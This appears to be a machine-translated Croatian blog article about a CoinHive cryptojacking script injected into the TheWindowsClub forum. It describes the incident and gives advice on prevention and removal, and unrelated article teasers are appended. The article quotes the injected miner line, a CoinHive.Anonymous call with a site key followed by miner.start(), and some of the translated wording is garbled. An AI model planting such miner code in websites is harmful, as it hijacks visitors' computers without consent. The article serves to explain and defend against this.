Bitcoin to Hit $10,000
Sadržaj:
Čitam o vlasnicima web stranica koristeći skripte na svojim web stranicama koje koriste CPU računala posjetitelja kada posjete njihovu web stranicu. Ideja je unovčiti njihov sadržaj - pa umjesto upotrebe oglasa upotrebljavaju skriptu koja se pokreće u pregledniku i upotrebljava korisničke resurse računala na kriptovalu. Ali mislio sam da samo vlasnici web stranica to čine dizajniranjem - nikada nisam zamišljao da će hakeri hakirati web stranice i gurati skriptu na druge web stranice i koristiti svoje posjetitelje CPU kako bi zaradili novac za sebe.
Jučer kad sam posjetio naš TWC Forum, koji radi na vBulletin softveru, moj sigurnosni softver je upozorio ovo upozorenje:
// coinhive dot com /lib/coinhive.js Pronađena datoteka objekta, preuzimanje blokirano
Obično obično posjećujem forum svakodnevno i nisam ga vidio dan prije. Pretpostavljam da se to dogodilo neko vrijeme tijekom noći, moje vrijeme, kad sam spavao.
Koristim vBulletin softver za forum, a ažuriran je na najnoviju verziju. Štoviše, to je bilo vrlo iznenađujuće za nas, jer domena TheWindowsClub.com koristi
Sucuri Web Antivirus & Firewall kako bi se zaštitila od online prijetnji i napada na mreži. Moj PC sigurnosni softver uspješno je zaustavio pokretanje zlonamjernog scenarija na mojem Windows 10 računalu. Provjerili smo s drugim preglednicima kao što je Chrome & Edge, a rezultati su bili isti.
Nakon što desnom tipkom miša kliknete na web stranicu foruma i provjeravam izvorni kod, otkrio sam da je riječ o CryptoMiner zlonamjernoj skripti CoinHive. Ovo je zlonamjerni Coinhive Javascript koji je ušao u forumni kod:
var miner = novi CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
U svakom slučaju,
Sucuri ljudi su očistili forum Coinhive skripte koji je bio gurnut u moj forum za nekoliko sati, a sve
bilo je u redu.
Što je CoinHive Coinhive nudi JavaScript minatore za kriptoznu verziju Monera koju možete ugraditi u vašu web stranicu i koristiti CPU računalima posjetiteljima web stranica na kovanice za vas.
Ovo se zove
Cryptojacking
. To uključuje otmicu korisnika preglednika za kriptocurrency mining. Neki vlasnici web stranica mogu ga sami koristiti kako bi zaradili novac - ali u našem slučaju je ubrizgavao. Kada korisnik pristupa zaraženom mjestu, Coinhive JavaScript izvršava i uništava Monero korištenjem CPU resursa korisnika. To može dovesti do proboja CPU-a i neočekivanog pada sustava žrtvinog stroja. Sada, ako je vaš preglednik zaražen, vidjet ćete kako se vaš resurs povećava. Zatvorite preglednik i pada. Korisnik može primijetiti da se stroj zagrijava, ventilator se brzo pokreće ili se baterija brzo ispraznila.
Pitao sam kolegu Saurabh Mukhekar da posjeti moj forum koristeći njegov
Mac
i vidi što se dogodilo. Pa, njegovo Mac računalo je također pogođeno kada je otvorio forum sa Safarijom! On je jedan od onih pametnih Mac OSX korisnika koji koriste antivirusni softver za Mac. Njegov Avast antivirus za Mac uspješno je zaustavio pokretanje zlonamjernog scenarija. Saur Saurabh, Zlonamjerni softver CoinHive ne samo da otima Windows računalo već i Macove, jer je to infekcija Javascript bazirana na pregledniku. Dobro je da ne vjerujem u mitu da Macovi ne trebaju protuvirusni softver, inače bi moj stroj bio zaražen, a moj Mac će nastaviti uklanjanje kovanica za nekog drugog.
Spriječiti CoinHive da zarazi vašu web stranicu <
Ažuriranje vašeg CMS ažuriranja na najnoviju verziju
Ažuriranje softvera hostinga (PHP, baza podataka, itd.)
- Ne koristite NULL predloške ili dodatke na vašoj web stranici /Osigurajte svoje web stranice sa davateljima web sigurnosnih usluga kao što su Sucuri, Cloudflare, Wordfence, itd.
- Poduzmite osnovne mjere predostrožnosti kako biste osigurali svoj blog.
- Uklanjanje novčića iz web stranice
- Prije svega, morate biti webmaster
- Sada kad vaš antivirus otkriva infekciju CoinHive, desnom tipkom miša kliknite web stranicu i odaberite
Prikaži izvorni kod
. Potom pritisnite
Ctrl + F i potražite "CoinHive". Nakon što utvrdite lokaciju zlonamjernog koda, trebate vidjeti njegov položaj - gdje se nalazi. Sada ga morate ukloniti ručno. Da biste to učinili, potrebno vam je malo kodiranja znanja o vašoj platformi. Morat ćete pronaći zaraženu datoteku i ručno ukloniti iznad skripte. Ako niste sigurni u to, zamolite stručnjaka da to učini. Budući da koristimo Sucuri, dopustili smo im da to čine. Nakon toga, očistite predmemoriju poslužitelja i preglednika. Ako upotrebljavate dodatak za predmemoriju ili kažete MaxCDN, izbrišite i one spremišta. Zaštitite se od skripti kripto rudarstva
Kriptocurenti i tehnologija Blockchain preuzimaju svijet. To stvara utjecaj na globalno gospodarstvo i uzrokuje i prekide tehnologije. Svatko se počeo usredotočiti na tako unosan tržište - a to uključuje i hakere na web stranici. Kako se vraća povećava, trebali bismo očekivati da će takve tehnologije biti zloupotrijebljene. To je tamna strana bilo koje nove tehnologije.
Usto možemo poduzeti sve moguće mjere predostrožnosti. Osim upotrebe dobrog sigurnosnog softvera, upotrijebite proširenje Chromea ili Firefoxa koji blokira web-lokacije od korištenja vašeg procesora u moju kriptoznu valutu - ili još bolje, upotrijebite Anti-WebMiner koji će zaustaviti napade Cryptojacking Mining Script prilagođavanjem datoteke Hosts. Radi na svim preglednicima. Ako ste korisnik Mac računala, za računalu potražite i protuvirusni softver.
Zbog obilne mjere predostrožnosti, ako ste ikada osjetili da ste posjetili zaraženu web lokaciju, bilo bi dobro očistiti vaš preglednik cache i skeniranje vašeg stroja pomoću antivirusnog softvera i AdwCleanera.
Budite sigurni, budite oprezni!
S boljim širokopojasnim brzinama i napredak u tehnologiji poslužitelja poslužitelja, web stranice spremne ugostiti velike količine vaši se podaci pojavljuju posvuda, a neki su besplatni. Ostale web stranice uzimaju vaše fotografije ili drugi sadržaj i pomažu vam da ih pretvorite u nešto zabavno za gledanje i slušanje. Ocijenite ove web-lokacije koliko su sigurni i jeftin, koliko će ih podataka pohraniti za vas i kvalitetu proizvoda koji proizlazi iz rada s vašim sadržajem na web mjestu.
Spremanje i dijeljenje sadržaja
5 Načina upotrebe stope napuštanja početne stranice za poboljšanje vaše web stranice
Jesu li posjetitelji bježali s vaše web stranice gotovo čim stignu tamo? Mnogo toga možete učiniti da to promijenite. Evo kako započeti.
Kako ukloniti najpopularnije web stranice i feedove vijesti na rubu Microsofta
Zbunjujući se s tim neugodnim Top Web lokacijama i predloženim feedovima vijesti na Microsoft Edgeu? Ne brini. Čitajte dalje kako biste naučili kako ih se riješiti u trenu!